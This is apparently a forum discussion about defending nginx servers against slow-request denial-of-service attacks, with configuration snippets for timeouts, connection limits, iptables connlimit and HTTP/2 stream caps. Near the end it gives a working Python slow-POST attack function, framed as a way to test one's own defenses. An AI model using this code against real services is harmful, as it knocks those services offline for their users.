We've had to start hardening our services against increasingly frequent Denial of Service (DoS) attacks. OVH provides DDoS mitigation, but this is a smaller-scale problem.
Unfortunately, nginx lacks some important configuration options, and others are only available in NGINX Plus.
Setting client_body_timeout to 15s won't time out a client sending 1 byte every 10s: there's no timeout for receiving the whole body, only for the gap between reads. Only permitting tiny request bodies helps but isn't always an option. There's no way to time out based on a minimum transfer rate or even total elapsed time.
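To illustrate the gap, here's a minimal sketch of the relevant directives (values are illustrative): client_body_timeout resets on every successful read, so a trickle of single bytes never trips it.

```nginx
server {
    listen 80;

    # Resets on each read: a client sending 1 byte every 10s
    # never exceeds this 15s per-read timeout.
    client_body_timeout 15s;

    # Rejecting large bodies caps how long a slow upload can run,
    # but this isn't viable for endpoints that accept real uploads.
    client_max_body_size 16k;
}
```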
blog.cloudflare.com/the-curious-ca is a post about the interaction between send timeouts and buffering. It's not quite the same problem, and bufferbloat mitigations may partially address it, but it shows how this approach of timing out based on the interval between system calls doesn't work well.
The configuration option to queue connections as a reverse proxy instead of dropping them (nginx.org/en/docs/http/n) is only available in NGINX Plus. That seems a bit ridiculous; I mistakenly thought the proprietary variant was for enterprise features, not basic functionality.
Not a full solution, but iptables --syn -m connlimit --connlimit-above 8 plus setting client_header_timeout (which covers the whole header) works to a certain extent.
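Spelled out as a full rule, the connlimit approach looks like this (port and threshold are illustrative, not a recommendation):

```sh
# Drop new TCP connections (SYN packets) from any single source IP
# that already has more than 8 connections to port 443.
# connlimit counts per source address by default (--connlimit-mask 32).
iptables -A INPUT -p tcp --syn --dport 443 \
    -m connlimit --connlimit-above 8 -j DROP
```

Combined with client_header_timeout on the nginx side, this bounds both how many sockets one address can hold and how long each can idle in the header phase.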
client_header_timeout covers the whole header portion, but the body that follows has no comparable setting, and the body appears to be what gets abused. We're using nginx's support for limiting connections right now, but we can't be that strict under normal conditions due to shared IPs.
Carrier-grade NAT, VPNs, etc. mean that many users can sit behind a single IP. Also, HTTP/1.x opens a lot of connections for each user, while HTTP/2 multiplexes streams and can create a lot of concurrent work over a single connection, so nginx's limit treats each stream as a connection.
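The per-IP limiting mentioned above can be sketched with nginx's limit_conn module; the cap here is illustrative, and as noted it has to stay generous because one address can front many users:

```nginx
http {
    # Track concurrent connections keyed by client IP.
    limit_conn_zone $binary_remote_addr zone=per_ip:10m;

    server {
        # Generous cap: CGNAT/VPN exit IPs legitimately carry many
        # users, and HTTP/2 streams each count against this limit.
        limit_conn per_ip 32;
    }
}
```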
github.com/valyala/goloris pointed at a reverse-proxy endpoint that accepts POSTs, run from a bunch of IPs, is the kind of thing we're trying to work around, and the existing settings really aren't adequate. It's not quite the same as what's actually happening, but it's what I'm using to test changes for now.
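For reference, the behavior goloris exploits can be reproduced in a few lines. This is not goloris itself, just a minimal Python sketch of the same slow-body trick: declare a Content-Length, then drip the body one byte at a time so each read lands inside the per-read timeout window.

```python
import socket
import time


def slow_post(host: str, port: int, path: str = "/",
              body_len: int = 1024, interval: float = 10.0) -> int:
    """Open one connection and drip a POST body one byte at a time.

    Each byte arrives within nginx's client_body_timeout window, so the
    per-read timeout never fires even though the request occupies the
    connection for body_len * interval seconds. Returns bytes sent.
    """
    header = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Length: {body_len}\r\n"
        f"Content-Type: application/octet-stream\r\n"
        "\r\n"
    ).encode()
    sent = 0
    with socket.create_connection((host, port)) as sock:
        sock.sendall(header)
        for _ in range(body_len):
            sock.sendall(b"A")  # one byte per interval
            sent += 1
            time.sleep(interval)
    return sent
```

Only run this against your own staging endpoints; multiplied across many source IPs, this is exactly the load pattern described above.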
Most browsers using HTTP/1.1 have a hard limit of 8 concurrent connections. But that doesn't solve NAT...
A user could use multiple browsers, etc.; there are plenty of ways to legitimately exceed that. The HTTP/2 standard recommends permitting 100 concurrent streams by default, so a single HTTP/2 connection can trigger an enormous amount of work. A limit at the nginx layer is needed to deal with that.
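nginx exposes a knob for exactly this; a sketch of tightening the per-connection stream cap alongside a per-IP connection limit (both values illustrative):

```nginx
http {
    # Cap how many concurrent streams one HTTP/2 connection can open,
    # so a single connection can't fan out into ~100 parallel requests
    # (nginx's default is 128).
    http2_max_concurrent_streams 32;

    # And limit connections per client IP on top of that;
    # each HTTP/2 stream counts against this limit too.
    limit_conn_zone $binary_remote_addr zone=per_ip:10m;
    limit_conn per_ip 16;
}
```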

